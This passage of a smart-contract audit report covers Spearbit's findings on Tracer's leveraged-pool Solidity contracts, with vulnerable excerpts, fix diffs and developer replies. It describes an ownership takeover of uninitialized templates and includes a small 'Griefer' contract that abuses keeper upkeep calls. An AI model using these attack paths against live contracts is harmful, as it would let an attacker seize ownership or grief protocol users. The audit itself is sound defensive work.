address(pairTokenBase); LeveragedPool poolBase = new LeveragedPool(); // not initialized poolBaseAddress = address(poolBase); PoolCommitter poolCommitterBase = new PoolCommitter(); // is initialized poolCommitterBaseAddress = address(poolCommitterBase); ... /* initialise base PoolCommitter template (with dummy values) */ poolCommitterBase.initialize(address(this), address(this), address(this), owner(), 0, 0, 0); } This means an attacker can initialize the templates setting them as the owner, and perform owner actions on contracts such as minting tokens. This can be misleading for users of the protocol as these minted tokens seem to be valid tokens. In PoolToken.initialize() an attacker can become the owner by calling initialize() with an address under his control as a parameter. The same can happen in LeveragedPool.initialize() with the initialization parameter. 13 contract PoolToken is ERC20_Cloneable, IPoolToken { ... } contract ERC20_Cloneable is ERC20, Initializable { function initialize(address _pool, ) external initializer { // not called for the template contract owner = _pool; ... } } contract LeveragedPool is ILeveragedPool, Initializable, IPausable { function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer { ,! // not called for the template contract ... // set the owner of the pool. This is governance when deployed from the factory governance = initialization._owner; } } Recommendation: pairTokenBase and poolBase should be initialized with dummy values. Consider using the upgradable versions of the OpenZeppelin ERC20 contracts, as they don’t have constructors. Tracer: Valid, fixed in PR 396. Spearbit: Acknowledged. 
5.3.4 Oracles are not updated before use
Severity: Medium Risk
Context: PoolKeeper.sol#L71, PoolKeeper.sol#L281
Description: The PoolKeeper contract uses two oracles but does not ensure that their prices are updated. The poll() function should be called on both oracles to get the first execution and the settlement/ETH prices. As it currently is, the code could operate on old data.
Recommendation: The price should be updated before using it. Note that calling poll() can revert in certain cases, depending on the oracle type, if:
1. It does not have enough data to create an SMA.
2. Not enough time has passed since it was last updated (require(block.timestamp >= lastUpdate + updateInterval, "SMA: Too early to update")).
Therefore, it is recommended to add a try {} catch {} block as shown in the code below:

function newPool(address _poolAddress) external override onlyFactory {
+   try IOracleWrapper(ILeveragedPool(_poolAddress).oracleWrapper()).poll() {} catch Error(string memory reason) {}
    int256 firstPrice = ILeveragedPool(_poolAddress).getOraclePrice();
    ...
}

function performUpkeepSinglePool(...) public override {
    ...
    try pool.poolUpkeep(lastExecutionPrice, latestPrice, _boundedIntervals, _numberOfIntervals) {
        ...
+       try IOracleWrapper(ILeveragedPool(_pool).settlementEthOracle()).poll() {} catch Error(string memory reason) {}
        payKeeper(_pool, gasPrice, gasSpent, savedPreviousUpdatedTimestamp, updateInterval);
        ...
    } catch Error(string memory reason) {
        ...
    }
}

Tracer: Regarding the settlementEthOracle, this should be a spot oracle, in which case poll() is a no-op. We are not sure if we should then still include a call to its poll() function. For the pool's main oracle wrapper, it is OK to not call the poll() function when the pool is added, because it is polled right when the pool upkeeps. This means the latest poll will get the most up-to-date price. We also now have a ramping-up feature in the SMA oracle for when it has been populated fewer times than the total number of periods available.
Spearbit: On the settlementEthOracle: if "spot oracle" means the ChainlinkOracleWrapper contract instead of SMAOracle, calling poll() on it does not change its state, because it is the same as getPrice(). However, the settlementOracle is chosen by the deployer, and people might as well deploy an SMAOracle, even if you intend it to be used differently, because your intent is not documented anywhere. In this case, it is better to trigger a poll(), or to document that it should be a spot oracle. On the pool's main oracle wrapper: we agree that you are already calling poll() on upkeep. This is about calling poll() for the startingPrice in newPool(), so the pool's start price is the latest one.
Tracer: Good point.
Spearbit: The recommendation has been implemented in PR 400, with the addition that if the poll fails, it will also emit a PoolUpkeepError.
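The recommended guard can be distilled into a compilable helper; IOracleWrapper here is a hypothetical minimal interface, not the full Tracer one:

// Poll an oracle defensively so a revert (e.g. "SMA: Too early to update")
// does not block the surrounding upkeep logic.
interface IOracleWrapper {
    function poll() external returns (int256);
    function getPrice() external view returns (int256);
}

contract OracleUser {
    function freshPrice(IOracleWrapper oracle) internal returns (int256) {
        // Best-effort update; swallow the revert if the oracle is not ready yet.
        try oracle.poll() {} catch {}
        return oracle.getPrice();
    }
}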
5.3.5 getPendingCommits() underreports commits
Severity: Medium Risk
Context: PoolCommitter.sol#L764
Description: When frontRunningInterval > updateInterval, the PoolCommitter.getAppropriateUpdateIntervalId() function can return updateInterval IDs that are arbitrarily far into the future, especially if appropriateIntervalId > updateIntervalId + 1. Therefore, commits can also be made to these appropriate interval IDs far in the future by calling commit(). The PoolCommitter.getPendingCommits() function only checks the commits for updateIntervalId and updateIntervalId + 1, but needs to check up to updateIntervalId + factorDifference + 1. Currently, it is underreporting the pending commits, which leads to the checkInvariants function not checking the correct values.
Recommendation: The getPendingCommits() function should return all possible pending commits, even in the case where frontRunningInterval > updateInterval. A sketch of the broader check is given after this finding.
Tracer: As part of the CARE program, we found that getPendingCommits() can be removed in favour of a running total of pending mints. This was done and merged into the main repository in PR 315.
Spearbit: The fix looks good, but naming the variable totalPendingMints is a bit ambiguous because:
• It sounds like it is a pool token amount, but it is a quote token amount. However, the naming for other variables (longMintAmount etc.) never distinguished this either, so at least it is consistent.
• It does not include mints from shortBurnLongMint/longBurnShortMint, which are also mints. It does not include these because you do not need to track them for the invariant checks. You could add a remark here about the exclusion.
Tracer: Addressed in issue 368 and PR 403.
Spearbit: Variable names were refactored in PR 403 to indicate whether they are in settlement tokens or pool tokens.
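A minimal sketch of the wider scan, assuming a hypothetical per-interval storage layout (pendingMintSettlementAmount is illustrative, not the actual Tracer state variable):

contract PendingCommits {
    mapping(uint256 => uint256) public pendingMintSettlementAmount; // per update interval id

    function totalPendingCommits(
        uint256 updateIntervalId,
        uint256 frontRunningInterval,
        uint256 updateInterval
    ) public view returns (uint256 totalPending) {
        // Commits may be assigned up to factorDifference + 1 intervals ahead,
        // so scan the whole reachable window instead of just id and id + 1.
        uint256 factorDifference = frontRunningInterval / updateInterval;
        for (uint256 id = updateIntervalId; id <= updateIntervalId + factorDifference + 1; id++) {
            totalPending += pendingMintSettlementAmount[id];
        }
    }
}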
5.3.6 Authenticity check for oracles is not effective
Severity: Medium Risk
Context: PoolFactory.sol#L93-L101
Description: The deployPool() function verifies the authenticity of the oracleWrapper by calling its deployer() function. As the oracleWrapper is supplied via deploymentParameters, it can be a malicious contract whose deployer() function can return any value, including msg.sender.
Note: this check does protect against frontrunning the deployment transaction of the same pool. See issue "Undocumented frontrunning protection".

function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) {
    ...
    require(IOracleWrapper(deploymentParameters.oracleWrapper).deployer() == msg.sender, "Deployer must be oracle wrapper owner");

Recommendation: Consider using an allowlist for oracles.
Tracer: As decided by the core Tracer team, no allowlists are going to be added. We do agree, though, that there is a risk. To address it without impinging on any degree of permissionlessness, the DAO will be carrying out security checks to give a safety score (akin to Rari protocol's security checks).
Spearbit: Acceptable if it is clearly shown in the user interface.

5.3.7 Incorrect calculation of keeper reward
Severity: Medium Risk
Context: PoolKeeper.sol#L251-L259
Description: The keeper reward is calculated as (keeperGas * tipPercent / 100) / 1e18. The division by 1e18 is incorrect and undervalues the reward for the keeper: the tip part of the keeper reward is essentially ignored. The likely cause of this miscalculation is the note at PoolKeeper.sol#L244, which states that the tip percent is in WAD units, while it really is a quad representation of a value in the range between 5 and 100. The comment at PoolKeeper.sol#L241 also incorrectly states that _keeperGas is in wei (usually referring to ETH), which is not the case, as it is denominated in the quote token, but in WAD precision.
Recommendation: The division by FIXED_POINT should be removed, and the comments should be corrected.

int256 wadRewardValue = ABDKMathQuad.toInt(
    ABDKMathQuad.add(
        ABDKMathQuad.fromUInt(_keeperGas),
-       ABDKMathQuad.div(
-           (
            ABDKMathQuad.div(
                (ABDKMathQuad.mul(ABDKMathQuad.fromUInt(_keeperGas), _tipPercent)),
                ABDKMathQuad.fromUInt(100)
            )
-           ),
-           FIXED_POINT
-       )
    )
);

Tracer: Valid, addressed in PR 391 and PR 428.
Spearbit: Acknowledged.

5.3.8 performUpkeepSinglePool() can result in a griefing attack when the pool has not been updated for many intervals
Severity: Medium Risk
Context: executeCommitments() in PoolCommitter
Description: Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. This in turn will call executeCommitments() repeatedly. For each call to executeCommitments(), the updateMintingFee() function will be called. This updates fees and changes them in an unexpected way. A griefing attack is possible by repeatedly calling executeCommitments() with boundedIntervals == true and numberOfIntervals == 0.
Note: Also see issue "It is not possible to call executeCommitments() for multiple old commits". It is also important that lastPriceTimestamp is only updated after the last executeCommitments(), otherwise it will revert.

function executeCommitments(bool boundedIntervals, uint256 numberOfIntervals) external override onlyPool {
    ...
    uint256 upperBound = boundedIntervals ? numberOfIntervals : type(uint256).max;
    ...
    while (i < upperBound) {
        if (block.timestamp >= lastPriceTimestamp + updateInterval * counter) {
            // lastPriceTimestamp shouldn't be updated too soon
            ...
        }
    }
    ...
    updateMintingFee(); // should do this once (in combination with _boundedIntervals == true)
    ...
}

Recommendation: Ensure updateMintingFee() is only called once in a series of calls to executeCommitments() with _boundedIntervals == true.
Tracer: We want the minting fee to be the most up-to-date whenever anyone commits to a mint. This means we do not need to update it every iteration, but we do want to make sure it is the most up-to-date at the end of the commitment executions. In the case of not executing all update intervals, we think it makes sense to still update the minting fee, so that if someone commits to a mint between this call to executeCommitments() and the next, they at least have a minting fee that has been updated since the last update interval. Addressed in PR 413.
Spearbit: Acknowledged.
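The griefing amounts to a simple loop; the keeper interface below is a hypothetical stand-in with an illustrative signature:

interface IPoolKeeper {
    function performUpkeepSinglePool(address pool, bool boundedIntervals, uint256 numberOfIntervals) external;
}

contract Griefer {
    // Each call executes zero intervals but still reaches updateMintingFee(),
    // nudging the fee in an unexpected way at negligible cost.
    function grief(IPoolKeeper keeper, address pool, uint256 n) external {
        for (uint256 i = 0; i < n; i++) {
            keeper.performUpkeepSinglePool(pool, true, 0);
        }
    }
}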
5.3.9 It is not possible to call executeCommitments() for multiple old commits
Severity: Medium Risk
Context: poolUpkeep() in LeveragedPool
Description: Assuming the pool has not been updated for many update intervals, performUpkeepSinglePool() can call poolUpkeep() repeatedly with _boundedIntervals == true and a bounded amount of gas to fix this situation. In this context the following problem occurs:
• In the first run of poolUpkeep(), lastPriceTimestamp will be set to block.timestamp.
• In the next run of poolUpkeep(), processing will stop at require(intervalPassed(), ...), because block.timestamp hasn't increased.
This means the rest of the commitments won't be executed by executeCommitments(), and updateIntervalId, which is updated in executeCommitments(), will start lagging.

function poolUpkeep(..., bool _boundedIntervals, uint256 _numberOfIntervals) external override onlyKeeper {
    require(intervalPassed(), "Update interval hasn't passed"); // next time lastPriceTimestamp == block.timestamp
    executePriceChange(_oldPrice, _newPrice); // should only do this once (in combination with _boundedIntervals == true)
    IPoolCommitter(poolCommitter).executeCommitments(_boundedIntervals, _numberOfIntervals);
    lastPriceTimestamp = block.timestamp; // shouldn't update until all executeCommitments() are processed
}

function intervalPassed() public view override returns (bool) {
    unchecked {
        return block.timestamp >= lastPriceTimestamp + updateInterval;
    }
}

Recommendation:
• Redesign the logic with boundedIntervals (see the related issues).
• Update lastPriceTimestamp only once all old commitments are processed.
• Ensure executePriceChange() is only executed once for a series of old commitments, to prevent negative side effects.
Tracer: As part of PR 392, we have a hardcoded limit to avoid running out of gas, but this also solves the user-supplied data problems. Let us know if you think this is a valid solution.
Spearbit: Acknowledged.

5.4 Low Risk

5.4.1 Incorrect comparison in getUpdatedAggregateBalance()
Severity: Low Risk
Context: PoolSwapLibrary.sol#L476-L490
Description: When the value of data.updateIntervalId accidentally happens to be larger than data.currentUpdateIntervalId in the getUpdatedAggregateBalance() function, it will execute the rest of the function, which shouldn't happen. Although this is unlikely, it is also very easy to prevent.

function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) {
    if (data.updateIntervalId == data.currentUpdateIntervalId) {
        // Update interval has not passed: No change
        return (0, 0, 0, 0, 0);
    }
}

Recommendation: The code should be changed to:

function getUpdatedAggregateBalance(UpdateData calldata data) external pure returns (...) {
-   if (data.updateIntervalId == data.currentUpdateIntervalId) {
+   if (data.updateIntervalId >= data.currentUpdateIntervalId) {
        // Update interval has not passed: No change
        return (0, 0, 0, 0, 0);
    }
}

Tracer: Valid, fixed in commit 259386d.
Spearbit: Acknowledged.
5.4.2 updateAggregateBalance() can run out of gas
Severity: Low Risk
Context: PoolCommitter.sol#L609-L682
Description: The updateAggregateBalance() function of the PoolCommitter contract contains a for loop that, in theory, could use up all the gas and result in a revert. The updateAggregateBalance() function checks all future intervals every time it is called and adds them back to the unAggregatedCommitments array, which is checked in the next function call. This would only be a problem if frontRunningInterval is much larger than updateInterval, a situation that seems unlikely in practice.

function updateAggregateBalance(address user) public override checkInvariantsAfterFunction {
    ...
    uint256[] memory currentIntervalIds = unAggregatedCommitments[user];
    uint256 unAggregatedLength = currentIntervalIds.length;
    for (uint256 i = 0; i < unAggregatedLength; i++) {
        uint256 id = currentIntervalIds[i];
        ...
        UserCommitment memory commitment = userCommitments[user][id];
        ...
        if (commitment.updateIntervalId < updateIntervalId) {
            ...
        } else {
            ...
            storageArrayPlaceHolder.push(currentIntervalIds[i]); // entry for future intervals stays in array
        }
    }
    delete unAggregatedCommitments[user];
    unAggregatedCommitments[user] = storageArrayPlaceHolder;
    ...
}

Recommendation: An upper limit to the number of future intervals (e.g. frontRunningInterval / updateInterval) should be set in the initialize() function of the LeveragedPool contract.
Tracer: Addressed in PR 392.
Spearbit: Have you checked that MAX_ITERATIONS = type(uint8).max loops is possible within gas limits? updateAggregateBalance() deletes all unAggregatedCommitments[] while there may be some commitments that have not been processed if the limit was reached. getAggregateBalance() does limit the loop, so it could give a different result.
Tracer: Thanks for raising that. We created this PR addressing it. We also realised PoolSwapLibrary::appropriateUpdateIntervalId was still buggy when the frontrunning interval is greater than the update interval.
Spearbit: It looks good. Some minor suggestions: commitmentIds.pop() can be put after the if statement, as it is executed in both the if and else blocks. It is safer to put commitmentIds.length > 1 before i < commitmentIds.length - 1: if commitmentIds.length happens to be 0, the statement will revert at commitmentIds.length - 1, although with the current code this will not happen.

if (unAggregatedLength > MAX_ITERATIONS && i < commitmentIds.length - 1 && commitmentIds.length > 1) {
    commitmentIds[i] = commitmentIds[commitmentIds.length - 1];
    commitmentIds.pop();
} else {
    commitmentIds.pop();
}

Tracer: We implemented the changes in PR 430.
Spearbit: Acknowledged.

5.4.3 Pool information might be lost if setFactory() of the PoolKeeper contract is called
Severity: Low Risk
Context: PoolKeeper.sol#L324-L327, PoolKeeper.sol#L83-L86
Description: The PoolKeeper contract has a function to change the factory: setFactory(). However, calling this function will make previous pools inaccessible for this PoolKeeper, unless the new factory imports the pools from the old factory. The isUpkeepRequiredSinglePool() function calls factory.isValidPool(_pool), and it will fail because the new factory doesn't know about the old pools. As this call is essential for upkeeping, the entire upkeep mechanism will fail.

function setFactory(address _factory) external override onlyOwner {
    factory = IPoolFactory(_factory);
    ...
}

function isUpkeepRequiredSinglePool(address _pool) public view override returns (bool) {
    if (!factory.isValidPool(_pool)) { // might not work if factory is changed
        return false;
    }
    ...
}

Recommendation: Make sure the implementations of setFactory() and isUpkeepRequiredSinglePool() are correct to specification when the factory is changed.
Tracer: Valid, fixed in PR 340.
Spearbit: Acknowledged.

5.4.4 Ether could be lost when calling commit()
Severity: Low Risk
Context: PoolCommitter.sol#L263-L317
Description: The commit() function sends the supplied ETH to makePaidClaimRequest() only if payForClaim == true. If the caller of commit() accidentally sends ETH when payForClaim == false, the ETH stays in the PoolCommitter contract and is effectively lost.
Note: This was also documented in Secureum's CARE Tracking.

function commit(...) external payable override checkInvariantsAfterFunction {
    ...
    if (payForClaim) {
        autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender);
    }
}

Recommendation: Consider changing the code to:

function commit(...) external payable override checkInvariantsAfterFunction {
    ...
    if (payForClaim) {
+       require(msg.value != 0, "Must pay for claim");
        autoClaim.makePaidClaimRequest{value: msg.value}(msg.sender);
+   } else {
+       require(msg.value == 0, "user's ETH would be lost");
    }
}

Tracer: Valid, fixed in PR 326.
Spearbit: Acknowledged.

5.4.5 Race condition if PoolFactory deploys pools before fees are set
Severity: Low Risk
Context: PoolFactory, PoolCommitter
Description: The deployPool() function of the PoolFactory contract can deploy pools before the changeInterval value and the minting and burning fees are set. This means that fees would not be subtracted. The exact boundaries for the mintingFee, burningFee and changeInterval values aren't clear: in some parts of the code < 1e18 is used, and in other parts <= 1e18. Furthermore, the initialize() function of the PoolCommitter contract doesn't check the value of changeInterval, and the setBurningFee(), setMintingFee() and setChangeInterval() functions of the PoolCommitter contract don't check the new values. Finally, two representations of 1e18 are used: 1e18 and PoolSwapLibrary.WAD_PRECISION.

contract PoolFactory is IPoolFactory, Ownable {
    function setMintAndBurnFeeAndChangeInterval(uint256 _mintingFee, uint256 _burningFee, ...) ... {
        ...
        require(_mintingFee <= 1e18, "Fee cannot be > 100%");
        require(_burningFee <= 1e18, "Fee cannot be > 100%");
        require(_changeInterval <= 1e18, "Change interval cannot be > 100%");
        mintingFee = _mintingFee;
        burningFee = _burningFee;
        changeInterval = _changeInterval;
        ...
    }

    function deployPool(PoolDeployment calldata deploymentParameters) external override returns (address) {
        ...
        // no check that mintingFee, burningFee, changeInterval are set
        poolCommitter.initialize(..., mintingFee, burningFee, changeInterval, ...);
    }
}

contract PoolCommitter is IPoolCommitter, Initializable {
    function initialize(..., uint256 _mintingFee, uint256 _burningFee, ...) ... {
        ...
        require(_mintingFee < PoolSwapLibrary.WAD_PRECISION, "Minting fee >= 100%");
        require(_burningFee < PoolSwapLibrary.WAD_PRECISION, "Burning fee >= 100%");
        ... // no check on _changeInterval
        mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee);
        burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee);
        changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval);
        ...
    }

    function setBurningFee(uint256 _burningFee) external override onlyGov {
        burningFee = PoolSwapLibrary.convertUIntToDecimal(_burningFee); // no check on _burningFee
        ...
    }

    function setMintingFee(uint256 _mintingFee) external override onlyGov {
        mintingFee = PoolSwapLibrary.convertUIntToDecimal(_mintingFee); // no check on _mintingFee
        ...
    }

    function setChangeInterval(uint256 _changeInterval) external override onlyGov {
        changeInterval = PoolSwapLibrary.convertUIntToDecimal(_changeInterval); // no check on _changeInterval
        ...
    }

    function updateMintingFee(bytes16 longTokenPrice, bytes16 shortTokenPrice) private {
        ...
        if (PoolSwapLibrary.compareDecimals(mintingFee, MAX_MINTING_FEE) == 1) {
            // mintingFee is greater than 1 (100%).
            // We want to cap this at a theoretical max of 100%
            mintingFee = MAX_MINTING_FEE; // so mintingFee is allowed to be 1e18
        }
    }
}

Recommendation:
• Initialize the values of mintingFee, burningFee and changeInterval in the constructor of the PoolFactory contract, or check in the deployPool() function that the values for mintingFee, burningFee and changeInterval are set.
• Double-check the maximum values of mintingFee, burningFee and changeInterval.
• Check the value of _changeInterval in the initialize() function of the PoolCommitter contract.
• Check the new values in the setBurningFee(), setMintingFee() and setChangeInterval() functions of the PoolCommitter contract.
• Replace 1e18 with PoolSwapLibrary.WAD_PRECISION.
Tracer: Disputed, as it is fine if we want a 0 minting/burning fee and change interval. The minting and burning fees, but most particularly the change interval, are things we want to experiment with in the real market, and we want to be able to not use them if desired. Furthermore, the PoolDeployment type captures the market creator's desire for fees, so this seems like a non-issue. As for the bounds on both the minting and burning fees, the inconsistency in the enforcement of the upper bounds is a defect, but we have since capped the burning fee arbitrarily at 10%, so this seems to be an implicit mitigation. We don't have a cap on what the minting fee can be. This was a decision made by our RnD.
Spearbit: It might be helpful to add a comment to the definition of the mintingFee, burningFee and changeInterval variables, stating that a zero value is also allowed.
Tracer: Addressed in PR 421.
Spearbit: Acknowledged.
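For reference, a minimal sketch of validating bounds in a setter, should the team later want it; WAD_PRECISION = 1e18 and all names are illustrative rather than the actual Tracer code:

contract FeeBounds {
    uint256 public constant WAD_PRECISION = 1e18; // one representation of 100%
    uint256 public mintingFee;
    address public immutable gov;

    constructor() {
        gov = msg.sender;
    }

    modifier onlyGov() {
        require(msg.sender == gov, "not gov");
        _;
    }

    // The setter enforces the upper bound; a zero fee remains allowed.
    function setMintingFee(uint256 _mintingFee) external onlyGov {
        require(_mintingFee <= WAD_PRECISION, "Minting fee > 100%");
        mintingFee = _mintingFee;
    }
}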
5.4.6 Committer not validated on withdraw claim and multi-paid claim
Severity: Low Risk
Context: AutoClaim.sol#L118, AutoClaim.sol#L136, AutoClaim.sol#L150
Description: AutoClaim checks that the committer creating the claim request in makePaidClaimRequest() and withdrawing the claim request in withdrawUserClaimRequest() is a valid committer for the PoolFactory used in the AutoClaim initializer. The same security check should be done in all the other functions where the committer is passed as a function parameter.
Recommendation: A validity check should be added for the poolCommitter passed as a parameter, as is done in the scenarios where the msg.sender is the committer itself.

function multiPaidClaimMultiplePoolCommitters(address[] calldata users, address[] calldata poolCommitterAddresses) external override {
    ...
    for (uint256 i; i < users.length; i++) {
+       require(poolFactory.isValidPoolCommitter(poolCommitterAddresses[i]), "poolCommitter not valid PoolCommitter");
        ...
    }
    ...
}

function multiPaidClaimSinglePoolCommitter(address[] calldata users, address poolCommitterAddress) external override {
+   require(poolFactory.isValidPoolCommitter(poolCommitterAddress), "poolCommitter not valid PoolCommitter");
    ...
}

function withdrawClaimRequest(address poolCommitter) external override {
+   require(poolFactory.isValidPoolCommitter(poolCommitter), "poolCommitter not valid PoolCommitter");
    ...
}

Tracer: We are trying to evaluate the benefits of this. In the case of multiPaidClaimMultiplePoolCommitters():
• More gas: this would be an extra check for every iteration.
• checkClaim() will return false, meaning nothing will happen when the claim() function is called.
• Correct implementations of the off-chain auto-claiming bots will use correct data.
The same can be applied to multiPaidClaimSinglePoolCommitter(), but only one extra check would be required rather than one in every iteration. We do not believe we should be doing on-chain stuff to cater for incorrect off-chain bot implementations. In the case of withdrawClaimRequest(), I'd be OK with adding this check.
Spearbit: It is less about catering for incorrect off-chain bots, and more about hardening security. We do not think it is immediately obvious why not checking the validity of the pool committers in these functions is not a security issue. You need to argue that:
• Claim requests can only be made by, and stored with, valid pool committers as an index, so invalid pool committer rewards will always be zero.
• An attacker-controlled pool committer argument does not lead to re-entrancy and other security issues in these functions.
• Also, not checking it might be fine now, but not anymore with future code updates, and it is easy to forget that the pool committers are not checked for validity in all functions.
Of course, it is up to you to decide whether the additional security checks are worth the gas costs. You should at least document that you are deliberately not checking the validity here, and state the above-mentioned reasoning why it is not a security issue in the current code.
Tracer: On the first point: we think this is already enforced by including the onlyPoolCommitter() modifier in makePaidClaimRequest(), so any subsequent claim attempts will only have claim requests that are populated with non-zero data if they came from a pool committer deployed by the factory. On the second point: we believe this should always hold due to the checkClaim() call in the multiPaidClaimMultiplePoolCommitters() and multiPaidClaimSinglePoolCommitter() functions. On the third point: this is definitely a good point, and we would be happy to add these checks for this reason. Addressed in issue 359.
Spearbit: Acknowledged.

5.5 Gas Optimization

5.5.1 Some SMAOracle and AutoClaim state variables can be declared as immutable
Severity: Gas Optimization
Context: SMAOracle.sol#L8-L26, AutoClaim.sol#L18
Description: In the SMAOracle contract, the oracle, periods, observer, scaler and updateInterval state variables are not declared as immutable. In the AutoClaim contract, the poolFactory state variable is not declared as immutable. Since the mentioned variables are only initialized in the contracts' constructors, they can be declared as immutable in order to save gas.
Recommendation: Declare the mentioned variables as immutable.

contract SMAOracle is IOracleWrapper {
    /// Price oracle supplying the spot price of the quote asset
-   address public override oracle;
+   address public immutable override oracle;
    ...
    /// Price observer providing the SMA oracle with historical pricing data
-   address public observer;
+   address public immutable observer;
    /// Number of periods to use in calculating the SMA (`k` in the SMA equation)
-   uint256 public periods;
+   uint256 public immutable periods;
    ...
    /// Duration between price updates
-   uint256 public updateInterval;
+   uint256 public immutable updateInterval;
-   int256 public scaler;
+   int256 public immutable scaler;
    ...
}

contract AutoClaim is IAutoClaim {
    ...
-   IPoolFactory internal poolFactory;
+   IPoolFactory internal immutable poolFactory;
    ...
}

Tracer: We are submitting PR 406 as a mitigation for this. It is a slightly larger PR than we originally intended, so as a result it will likely be submitted for several defects here. We would appreciate it if each defect could be assessed against it.
Spearbit: Correctly changed to immutable, except for AutoClaim, which is not part of PR 406.
Tracer: Good point. Addressed in PR 429.
5.5.2 Use of counters can be optimized
Severity: Gas Optimization
Context: PoolCommitter.sol#L504-L522
Description: counter and i are both used as counters for the same loop.

uint32 counter = 1;
uint256 i = 0;
...
while (i < upperBound) {
    ...
    unchecked {
        counter += 1;
    }
    i++;
}

Recommendation: Keep only one counter.

-   uint32 counter = 1;
+   uint256 counter = 1;
-   uint256 i = 0;
    ...
-   while (i < upperBound) {
+   while (counter <= upperBound) {
        ...
-       i++;
    }

Tracer: This has already been addressed as part of one of the CARE programs. The current state of the function can be seen at PoolCommitter.sol#L481.
Spearbit: The double counter issue has been fixed.
Note: _updateIntervalId is assigned but not used in PoolCommitter.sol#L517.
Note: The bounded loop has been replaced by an unbounded loop in PoolCommitter.sol#L514, which introduces the risk of the function running out of gas.

5.5.3 transferOwnership() function is inaccessible
Severity: Gas Optimization
Context: ERC20_Cloneable.sol#L89-L92
Description: The ERC20_Cloneable contract contains a transferOwnership() function that may only be called by the owner, which is PoolFactory. However, PoolFactory doesn't call the function, so it is essentially dead code, making the deployment cost unnecessary additional gas.

function transferOwnership(address _owner) external onlyOwner {
    require(_owner != address(0), "Owner: setting to 0 address");
    owner = _owner;
}

Recommendation: Double-check whether there is any use for the transferOwnership() function. If so, make it accessible; otherwise remove the function.
Tracer: Valid, will fix.

5.5.4 Use cached values when present
Severity: Gas Optimization
Context: PoolCommitter.sol#L609-L632
Description: The updateAggregateBalance() function creates a temporary variable id with the value currentIntervalIds[i]. Immediately after that, currentIntervalIds[i] is used again. This could be replaced by id to save gas.

function updateAggregateBalance(address user) public override checkInvariantsAfterFunction {
    ...
    for (uint256 i = 0; i < unAggregatedLength; i++) {
        uint256 id = currentIntervalIds[i];
        if (currentIntervalIds[i] == 0) { // could use id
            continue;
        }

Recommendation: The code should be changed to:

function updateAggregateBalance(address user) public override checkInvariantsAfterFunction {
    ...
    uint256 id = currentIntervalIds[i];
-   if (currentIntervalIds[i] == 0) {
+   if (id == 0) {
}

Tracer: Valid, fixed in PR 330.

5.5.5 _invariantCheckContract stored twice
Severity: Gas Optimization
Context: PoolCommitter.sol, LeveragedPool.sol
Description: Both the PoolCommitter and LeveragedPool contracts store the value of _invariantCheckContract twice, in both invariantCheckContract and invariantCheck. This is not necessary and costs extra gas.

contract PoolCommitter is IPoolCommitter, Initializable {
    ...
    address public invariantCheckContract;
    IInvariantCheck public invariantCheck;
    ...
    function initialize(..., address _invariantCheckContract, ...) external override initializer {
        ...
        invariantCheckContract = _invariantCheckContract;
        invariantCheck = IInvariantCheck(_invariantCheckContract);
        ...
    }
}

contract LeveragedPool is ILeveragedPool, Initializable, IPausable {
    ...
    address public invariantCheckContract;
    IInvariantCheck public invariantCheck;
    ...
    function initialize(ILeveragedPool.Initialization calldata initialization) external override initializer {
        ...
        invariantCheckContract = initialization._invariantCheckContract;
        invariantCheck = IInvariantCheck(initialization._invariantCheckContract);
    }
}

Recommendation: Store the value of _invariantCheckContract once and use typecasts to convert it to the required type.
Tracer: Valid, fixed by PR 398.
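A minimal sketch of the single-slot variant, with a hypothetical one-function IInvariantCheck interface:

interface IInvariantCheck {
    function checkInvariants(address pool) external;
}

contract PoolCommitterLike {
    address public invariantCheckContract; // single storage slot

    function initialize(address _invariantCheckContract) external {
        invariantCheckContract = _invariantCheckContract;
    }

    function runCheck() internal {
        // Typecast at the call site; no second storage variable needed.
        IInvariantCheck(invariantCheckContract).checkInvariants(address(this));
    }
}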
5.5.6 Unnecessary if/else statement in LeveragedPool
Severity: Gas Optimization
Context: LeveragedPool.sol#L352
Description: A boolean variable is used to indicate the type of token to mint. The if/else statement can be avoided by using LONG_INDEX or SHORT_INDEX as the parameter, instead of a bool, to indicate the use of the long or short token.

uint256 public constant LONG_INDEX = 0;
uint256 public constant SHORT_INDEX = 1;
...
function mintTokens(bool isLongToken, ...) {
    if (isLongToken) {
        IPoolToken(tokens[LONG_INDEX]).mint(...);
    } else {
        IPoolToken(tokens[SHORT_INDEX]).mint(...);
    ...

Recommendation: The bool isLongToken parameter should be replaced by uint256 tokenType, and the if/else statement should be removed. Note: uint8 tokenType might be even more efficient on Arbitrum.

-   function mintTokens(bool isLongToken, ...) {
+   function mintTokens(uint256 tokenType, ...) {
        ...
-       if (isLongToken) {
-           IPoolToken(tokens[LONG_INDEX]).mint(...);
-       } else {
-           IPoolToken(tokens[SHORT_INDEX]).mint(...);
-       }
+       IPoolToken(tokens[tokenType]).mint(...);

Tracer: Valid, fixed in PR 338.

5.5.7 Uncached array length used in loop
Severity: Gas Optimization
Context: AutoClaim.sol#L115
Description: The users array length is used in a for loop condition, so the length of the array is evaluated in every loop iteration. Evaluating it once and caching it can save gas.

for (uint256 i; i < users.length; i++) {
    ...
}

Recommendation: The code should be changed to:

-   for (uint256 i; i < users.length; i++) {
+   uint256 nrUsers = users.length;
+   for (uint256 i; i < nrUsers; i++) {

Tracer: Valid, fixed in PR 331.

5.5.8 Unnecessary deletion of array elements in a loop is expensive
Severity: Gas Optimization
Context: PoolCommitter.sol#L653
Description: The unAggregatedCommitments[user] array is deleted after the for loop in updateAggregateBalance(). Therefore, deleting the array elements one by one with delete unAggregatedCommitments[user][i]; in the loop body costs unnecessary gas.
Recommendation: The array element deletions in the loop should be removed.

function updateAggregateBalance(address user) public override checkInvariantsAfterFunction {
    ...
    for (uint256 i = 0; i < unAggregatedLength; i++) {
        ...
        if (commitment.updateIntervalId < updateIntervalId) {
            ...
-           delete unAggregatedCommitments[user][i];
        } else {
            ...
        }
    }
    delete unAggregatedCommitments[user];
    ...
}

Tracer: Valid, fixed in PR 385.

5.5.9 Zero-value transfers are allowed
Severity: Gas Optimization
Context: AutoClaim.sol#L77
